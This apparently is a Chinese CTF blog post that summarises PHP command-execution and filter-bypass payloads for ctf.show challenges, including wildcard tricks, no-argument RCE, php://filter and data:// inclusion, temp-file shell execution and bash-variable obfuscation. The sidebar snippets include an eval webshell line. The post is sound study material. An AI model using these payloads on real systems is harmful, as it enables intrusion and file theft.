命令执行总结

最新推荐文章于 2023-04-24 15:44:46 发布
最新推荐文章于 2023-04-24 15:44:46 发布
阅读量1.9k 收藏 9
点赞数 9
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ccfly1012/article/details/120099256
版权

萌新总结,仅供参考的~~~~~

目录

最常用的绕过

通配符

执行函数

cat被过滤

空格被过滤

php被过滤

无参函数读取文件

无参rce

数字,字母被禁

英文被禁,保留数字

全都被禁

include函数的使用

伪协议

data协议

>/del/null 2>&1(黑洞)

文件读取

缓冲区

Bash的内置变量绕过

特殊的

最常用的绕过

通配符

*可以匹配0或多个字符
?可以匹配任意一个字符
[abcd]匹配abcd中任意一个字符
[a-z]表示范围a到z,表示范围的意思[]匹配括号中任意一个字符

例如:

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

在这一题中过滤掉了flag,我们就可以直接用f*或f???代替

执行函数

system()与``作用相同,但是需要echo特殊的
"\x73\x79\x73\x74\x65\x6d"()也等于system()
passthru()
exec()
shell_exec()

cat被过滤

1.tac:从最后一行开始显示,是cat的反向显示
2.more:一页一页的显示档案内容
3.less:与more类似
4.head:查看文档的前几行
5.tail:查看文档的后几行
6.nl:显示的时候,顺便输入行号
7.od:以二进制的方式读取档案内容
8.vi:一种编辑器
9.uniq:查看
10.vim:一种编译器

空格被过滤

1.${IFS}
2.$IFS$1
3.${IFS
4.%20空格
5.<和<>重定向符
6.%09水平制表符

php被过滤

可以直接通配符匹配
在php结构内,<?php就等于<?=

无参函数读取文件

无参rce

?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

关于无参rce

localeconv()返回一包含本地数字及货币格式信息的数组。第一个是小数点。
pos()取得数组内容
scandir()查看该路径下的目录
array_reverse()数组逆转
next() 函数将内部指针指向数组中的下一个元素,并输出。
show_source()显示源码

数字,字母被禁

英文被禁,保留数字

可以使用base64通配符进行匹配命令执行进行查看flag

?c=/???/????64 flag.php
意思/bin/base64 flag.php

其次,我们可以利用bzip2命令

可以利用/usr/bin下的bzip2

?c=/???/???/????2 ????.???
/usr/bin/bzip2 flag.php

全都被禁

第三个使用.(进行)执行sh命令

上传post文件数据包

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://ae82ef6f-deed-491d-bebf-7498e32cc9b1.challenge.ctf.show:8080/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

然后抓包,执行poc执行命令

?c=.+/???/????????[@-[]

#!/bin/sh
ls
#!/bin/sh
tac flag.php

include函数的使用

在执行函数被禁后,可以使用include函数,

例题:

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

在这一题中,多数的命令执行函数都被禁了,所以我们可以尝试使用include函数进行绕过

?c=include"$_GET[1]"?>&1=php://filter/read=convert.base64-
encode/resource=flag.php

c包含一个get传入的参数1,在原题的源码里禁用的函数只对c禁用,1是随便用的,然后用1来读取flag.php

伪协议

data协议

在命令执行中源码会使用include函数,而不是eval函数

?c=data://text/plain,<?php phpinfo();>

data会把后面的数字,字符串作为php代码执行

?c=data://text/plain,<?php system('cat fl??.php';?)

>/del/null 2>&1(黑洞)

/dev/null 2>&1,它的作用为执行某个命令不会有任何输出

绕过的方法就是,多用一个命令,进行命令的一个组合

?c=ls;ls
?c=cat flag.php;ls

特殊的,我们使用的符号有

;
||
&&——%26%26

还有一个方法就是复制文件或移动文件

?c=cp${IFS}/fla?${IFS}/var/www/html/b.txt||ls
b.txt

文件读取

源码

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

常见的

 c=echo file_get_contents("flag.php");
使用include函数,include($_GET[a]);?a=php://filter/convert.base64-encode/resource=flag.php
高亮函数,c=highlight_file("flag.php");
show_source函数,c=show_source("flag.php");
c=include("flag.php");echo $flag;
c=include('flag.php');var_dump(get_defined_vars());
c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

缓冲区

<?php
​
/*
​
# -*- coding: utf-8 -*-
​
# @Author: Lazzaro
​
# @Date:   2020-09-05 20:49:30
​
# @Last Modified by:   h1xa
​
# @Last Modified time: 2020-09-07 22:02:47
​
# @email: h1xa@ctfer.com
​
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}
​
?>
​
你要上天吗?

函数解释

ob_get_contents()——返回输出缓冲区的内容
ob_end_clean——清空(擦除)缓冲区并关闭输出缓冲

解题的思路就是,

执行PHP的代码,让后面的匹配缓冲区不执行直接退出

例如payload

c=include('/flag.txt');exit(0);
c=require_once('/flag.txt');exit();
c=?><?php    //前面的?>用来闭合<?
    $a=new DirectoryIterator("glob:///*");   //php使用glob遍历文件夹
    foreach($a as $f) 
    {
        echo($f->__toString().' ');
    } 
    exit(0);
?>

Bash的内置变量绕过

具体含义利用~获取变量的最后几位,

~0获取最后一位
~1获取最后两位
~[a-z]/[A-Z]获取最后一位,等同数字0
在这要配合$PWD,$PATH
$PWD——echo $PWD会输出当前目录名

特殊的

一般$PATH是以bin结尾,所以${PATH:-A}为n
在hint1中,我们可知当前目录是/var/www/html,也就是${PWD:-A}为l
我们就可以构造nl
nl flag.php
${PATH:~A}${PWD:~A} ????.???
${HOME:${#HOSTNAME}:${#SHLVL}}为t
${PWD:${Z}:${#SHLVL}}为/
/bin/cat flag.php
${PWD:${Z}:${#SHLVL}}???${PWD:${Z}:${#SHLVL}}??${HOME:${#HOSTNAME}:${#SHLVL}} ????.???
${#SHLVL}的值是1,所以${PWD::${#SHLVL}}的值是/
${#RANDOM}的值大概率是4或5,这就构造出4了
/bin/base64 flag.php
${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?????${#RANDOM} ????.???
${USER:}的最后一位为a
/bin/cat flag.php
${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?${USER:~A}? ????.???
${##}和${#?}可以代替SHLVL,${PWD::${#?}}=/
/bin/rev flag.php
${PWD::${#?}}???${PWD::${#?}}${PWD:${IFS}:${#?}}?? ????.???

parkour-
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
命令执行小结
ashMOB的博客
01-05 2572
命令执行小结 文章目录命令执行小结代码执行命令执行绕过思路对单词的过滤无参数RCE目录更换尝试读取文件无数字字母RCE异或或取反自增(*7.0.12以上版本不可使用*)上传临时文件getshell绕过重定向突破disable_function限制骚操作shell进阶绕过安全目录FFI 代码执行 通俗的来说是执行php的代码,经常需要利用命令执行有关的函数来读取flag 常用函数: eval() 例子: <?php eval($_GET['pass']) ?> assert() PHP
MSsql2005(Sa)权限执行命令总结.txt
07-18
### MSsql2005(Sa)权限执行命令总结 #### 概述 在Microsoft SQL Server 2005环境中,管理员级别的用户(通常指Sa用户)拥有对数据库服务器进行高级管理和配置的能力。本文档主要汇总了与Sa权限相关的执行命令,...
执行命令
hududanyzd
12-22 94
最近经常要在C#中使用cmd命令,因此就封装了几个方法来使用。代码如下: /// /// 执行cmd.exe命令 /// ///命令文本 /// 命令输出文本 public static string ExeCommand(string commandText) { return ExeCommand(new string[] { commandText }); ...
linux中的分号&&和&,|和||说明与用法
qq_30339595的博客
01-03 427
“;”分号用法 方式:command1 ; command2 用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败, 所有命令都会执行。 “| ”管道符用法 上一条命令的输出,作为下一条命令参数 方式:command1 | command2 Linux所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着第一个命令的...
linux常用命令总结文档
07-31
### Linux常用命令总结知识点 #### 一、命令格式与系统运行级别 - **命令格式**: - **标准格式**:`命令[-选项][参数]` - **示例**:`ls –la /etc` - 在某些情况下,特定命令可能不遵循此格式。 - 多个选项...
常用dos命令总结
09-20
总结来说,DOS命令是计算机早期操作系统的核心组成部分,尽管在现代操作系统中这些命令的重要性已经大不如前,但它们在计算机发展史上依然占据了重要的地位。掌握这些命令的使用对于理解计算机操作系统的工作原理...
强大的shell命令总结
07-22
**: 重新执行上一个命令,并且以root权限运行。这对于需要提升权限才能执行的操作非常有用。 - 示例: 1. 输入 `apt-get install package` 而忘记添加 `sudo` 2. 使用 `sudo !!` 快速提升权限并重新执行命令。 ...
命令执行绕过总结
box
07-23 2243
命令执行绕过总结 Linux篇 命令拼接 a=who b=ami $a$b //输出whoami 常用字符使用 & 表示将任务置于后台执行 ; 多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块 && 只有在 && 左边的命令返回真(命令返回值 $? == 0),&&右边的命令才会被执行。 || 只有在 || 左边的命令返回假(命令返回值 $? == 1),
工作总结命令执行
学习讨论
07-12 599
项目开发工作总结执行力 在项目开发中的命令执行力,决定了项目中各项决策能否真正的彻底的执行,决定了项目发展的方向和速度。 在前一个项目和当前的项目中,执行力的问题一直都存在。存在命令执行,系统部署中发现项目部署人员对系统的理解和实际系统的状态有较大出入,为项目部署造成很大困难。造成这种状况的主要原因是:   1.命令发布背景具有一定的随机性 大多数命令的发布背景是从实际出...
命令执行各种姿势总结
最新发布
weixin_48427966的博客
04-24 1029
一、绕过if(!eval($c);web30。
命令执行各种绕过总结
m0_64815693的博客
10-11 8787
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
window命令执行命令小结
xuq09的专栏
12-19 1332
1.window下命令行工具: cmd工具和Window PowerShell( win10推荐使用)   2.常用命令 cmd下查看当前登陆用户 cmd下查看当前登陆用户 终端下,自然可以用quser这个命令了.但是在其它如专业版2k下如何查看在线用户呢? C:\Documents and Settings\Administrator&gt;net config workstati...
浅谈命令执行
西部壮仔的博客
04-01 318
简介 随着IT技术的飞速发展,“计算机”的形态多种多样(大型服务器、PC机、智能终端等等,以及运行其上的形形色色的应用),不同角色的人在计算机系统中所扮演的角色各异(开发者、维护者、高级用户、普通用户、管理者等等)。这些场景中,数据甚至指令通常都无法事先固化,需要在运行的过程中动态输入。如果这两者混杂在一块,没有经过良好的组织,就会被黑客加以利用,成为一种典型的攻击方式——命令注入。 漏洞原理 部...
Python 系统执行命令system,popen,commands
LeonKing1912的博客
08-25 408
os.system是我们在系统执行命令方面最常用的模块,但是在获取命令执行结果和返回值方面不如os.popen和commands模块的getstatusoutput 命令格式: os.system('cat /test/myfile')#无法获取返回值和执行结果 output=os.popen('cat /test/myfile')#output以文件形式得到命令的执
RCE-命令执行总结
m0_62008601的博客
11-23 958
命令执行总结,更新ing~~
MATLAB常用命令和函数总结
* `Ctrl+C`:中断正在执行命令。 二、函数及运算 MATLAB提供了丰富的函数和运算符,用于进行科学计算和数据分析。常用的运算符包括: * `+`:加。 * `-`:减。 * `*`:乘。 * `/`:除。 * `\`:左除。 * `^`:...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值